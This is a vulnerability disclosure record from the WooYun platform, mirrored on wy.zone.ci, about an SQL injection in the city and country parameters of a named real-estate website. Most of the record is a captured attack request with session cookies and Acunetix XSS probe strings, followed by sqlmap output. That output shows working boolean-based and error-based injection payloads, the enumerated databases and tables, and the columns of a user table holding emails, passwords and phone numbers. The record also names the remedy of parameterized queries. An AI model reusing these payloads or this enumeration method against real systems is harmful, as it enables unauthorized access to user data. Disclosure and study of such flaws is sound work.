乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-27: 细节已通知厂商并且等待厂商处理中 2015-10-02: 厂商已经主动忽略漏洞,细节向公众公开
rt
POST /house_hot/hots HTTP/1.1Content-Length: 37Content-Type: application/x-www-form-urlencodedReferer: http://overseas.5i5j.com:80/Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223aad4f993e9ef81fcc61cab8349f5a12%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22111.20.241.204%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1443201305%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dc96fa1d811150fce47f3e913defa2bdf; PHPSESSID=aiae139n3pu3ibp8nf4dh0m5q1; __utmt=1; __utma=228451417.1772374719.1443200739.1443200739.1443200739.1; __utmb=228451417.1.10.1443200739; __utmc=228451417; __utmz=228451417.1443200739.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __utmt_t2=1; _pzfxuvpc=1443198734429%7C1293309744112808338%7C2%7C1443201444338%7C1%7C%7C8584618636882922688; _pzfxsvpc=8584618636882922688%7C1443198734429%7C2%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); _pk_ref.12.afaf=%5B%22%22%2C%22%22%2C%22%22%2C%22%22%2C%22%22%2C%22%22%2C1443198734%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.12.afaf=fceebd0baed67aba.1443198734.1.1443201476.1443198734.; _pk_ses.12.afaf=*Host: overseas.5i5j.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*city=1'%22&country=USA&desc_w=0&page=
city参数和country参数都存在注入
sqlmap identified the following injection points with a total of 838 HTTP(s) requests:---Parameter: city (POST) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: city=-7540' OR MAKE_SET(9279=9279,5299) AND 'uuQP'='uuQP&country=USA&desc_w=0&page= Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: city=-9738' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (6626=6626) THEN 1 ELSE 0 END)),0x717a786271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&country=USA&desc_w=0&page=---web application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL >= 5.0.0current user: '5i5j@localhost'current database: '5i5j'current user is DBA: Falseavailable databases [3]:[*] 5i5j[*] information_schema[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: city (POST) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: city=-7540' OR MAKE_SET(9279=9279,5299) AND 'uuQP'='uuQP&country=USA&desc_w=0&page= Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: city=-9738' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (6626=6626) THEN 1 ELSE 0 END)),0x717a786271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&country=USA&desc_w=0&page=---web application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL >= 5.0.0Database: 5i5j[13 tables]+-------------------------+| zt_houses-bak || zt_5j_users || zt_adviser || zt_country_city || zt_entrust || zt_favorites || zt_house_pic || zt_house_pic_2014_05_08 || zt_houses || zt_houses_2014_05_08 || zt_news || zt_subject || zt_users |+-------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: city (POST) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: city=-7540' OR MAKE_SET(9279=9279,5299) AND 'uuQP'='uuQP&country=USA&desc_w=0&page= Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: city=-9738' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (6626=6626) THEN 1 ELSE 0 END)),0x717a786271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&country=USA&desc_w=0&page=---web application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL >= 5.0.0Database: 5i5jTable: zt_5j_users[8 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| 5j_id | varchar(255) || adddate | datetime || email | varchar(255) || Id | int(11) || lastlogin | datetime || password | varchar(255) || tel | varchar(255) || username | varchar(255) |+-----------+--------------+
参数化查询,参数过滤
危害等级:无影响厂商忽略
忽略时间:2015-10-02 14:20
漏洞Rank:4 (WooYun评价)
暂无